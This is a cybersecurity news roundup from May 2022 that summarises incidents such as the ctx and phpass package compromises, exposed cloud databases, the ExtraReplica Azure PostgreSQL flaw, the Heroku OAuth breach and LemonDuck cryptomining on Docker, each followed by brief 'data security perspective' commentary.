May 31, 2022

PyPI Package' ctx' And PHP Library' phpass' Compromised To Steal Environment Variables

May 24, 2022

PyPI package 'ctx' has been compromised by malicious actors to steal environment variables. The package, which typically gets over 22,000 downloads a week, had its code altered to collect environment variables and send them to a C2 after base64 encoding them. In addition to the PyPI package, a fork of PHP library 'phpass' was also altered similarly to retrieve AWS developer secrets and send them to the same C2 address as the ctx package. 

Data Security Perspective: For users of ctx, older versions of the package do not contain the malicious code. However, for newer versions 0.2.2, 0.2.6, and above, users should exercise caution and can check for malicious code. For users of phpass, the package appears to have been remedied to stop the attack. 

US Charity Exposed Users' Sensitive Images

May 11, 2022

Researchers from SafetyDetectives have uncovered a misconfigured AWS S3 bucket belonging to a Pennsylvania breast cancer charity, Breastcancer.org. The bucket, which was left unsecured, contained over 150,000 files or 150GB of data. The data included user avatars, and images users have posted, including private images that include nudity for medical purposes. In addition, the EXIF data was still intact in the images which includes GPS location and device details. The exposed bucket was discovered in November 2021, and has been secured as of May 2022.

Data Security Perspective: Cloud misconfigurations pose a massive risk to organizations and can have severe consequences. Organizations should ensure security policies are followed in order to prevent data exposure. Solutions such as Open Raven or Magpie can discover and alert about exposed data, along with other security policy violations.

Related Magpie Rulesaws-storage-s3-bucket-default-lock-enabled | aws-storage-s3-bucket-level-public-access-prohibited | aws-iam-and-security-iam-attached-policies | aws-security-best-practices

Wiz Research Discovers "ExtraReplica"— A Cross-Account Database Vulnerability In Azure PostgreSQL

April 28, 2022

Researchers at Wiz have discovered a vulnerability in the Microsoft Azure Database for PostgreSQL Flexible Server. The vulnerability, named "#ExtraReplica" bypasses tenant isolation enabling unauthorized read access to other PostgreSQL databases. Malicious actors could gain unauthorized access to other databases by exploiting a bug in the Flexible Server auth process that allows elevated privileges and then use an improperly anchored regex to gain access to the other database.

Data Security Perspective: Microsoft responded to the vulnerability with patches for the Flexible Server released in February 2022 and said that no customers had been affected. As noted by Wiz, this vulnerability highlights the lack of a cloud vulnerability database, similar to the CVE database, which enables users to track and respond to vulnerabilities.  

Heroku Admits To Customer Database Hack After OAuth Token Theft

May 5, 2022

After last month's security alert from Github that threat actors were stealing OAuth tokens from Heroku, and Travis-CI, Heroku announced the same stolen token was used to breach their customer database. The company announced the threat actor accessed and exfiltrated customer passwords from a customer database. Heroku initially reported that the stolen OAuth tokens could only provide threat actors to Github repositories but not to Heroku customer accounts. 

LemonDuck Targets Docker For Cryptomining Operations

April 21, 2022

Cryptomining botnet LemonDuck, has been targeting Docker to mine cryptocurrency on Linux. Exposed Docker APIs are targeted with a custom entry point downloading a disguised Bash script. The bash file then sets up a cronjob which downloads the payload and enables it to kill processes, daemons, and known network connections as well as remove other cryptominers. The payload downloads and runs XMRig cryptominer.

Data Security Perspective: The misuse of exposed Docker APIs is increasing, especially for cryptomining. Users should ensure they have the correct security configurations when using Docker. 

Medical Software Firm Fined €1.5M For Leaking Data Of 490k Patients

April 28, 2022

Medical software company Dedalus Biology has been fined 1.5 million Euros after exposing the PII of nearly 500,000 patients. The data, which came from a leaked database, included full names, genetic information, medical information such as medical conditions, and social security numbers. The leak appears to go back to March 2020, with parts of the dataset sold online in 2021. In total, Dedalus Biology was charged with three violations of GDPR, totaling 1.5 million Euros.

Data Security Perspective: Compliance is important for companies, especially those operating in Europe, as data exposure can lead to massive fines. Correct authentication and encryption are necessary for organizations, especially when handling sensitive data. 

Report: FOX Exposed Nearly 13 Million Content Management Records Online

An exposed database belonging to FOX has been discovered by security researchers from Website Planet. The database contained 58 GB of information, with nearly 13,000,000 records, including internal emails, employee ID numbers, IP addresses, host information, and cast and crew names, among other details. While it is not apparent how long the database was exposed, it has since been secured. 

Data Security Perspective: Having the correct configurations for databases and cloud resources is vital for organizations. This story highlights how even large corporations with security teams can be vulnerable to data exposure. 

Other News

Microsoft Finds New Elevation of Privilege Linux Vulnerability, Nimbuspwn

Below The Surface: Group-IB Identified 308,000 Exposed Databases In 2021

NPM Flaw Let Attackers Add Anyone As Maintainer To Malicious Packages

New Black Basta Ransomware Springs Into Action With a Dozen Breaches

Jira Vulnerability CVE-2022-0540

Cisco Umbrella Virtual Appliance Static SSH Host Key Vulnerability

Critical Argo CD Vulnerability Could Allow Attackers Admin Privileges

Rogue Cloud Users Could Sabotage Fellow Off Prem Tenants Via Critical Flux Flaw

A Closer Look At Eternity Malware

Pharmacy Giant Hit By Data Breach Affecting 3.6 Million

Highlighted Security Tool

Anchore Engine is an open-source tool that analyzes container images with user-customizable policies. In addition, Anchore also evaluates vulnerabilities in the container images. Anchor Engine can be used within multiple orchestration platforms such as Docker, Kubernetes, Amazon ECS, among others.  

Cloud Security Bulletins

GCP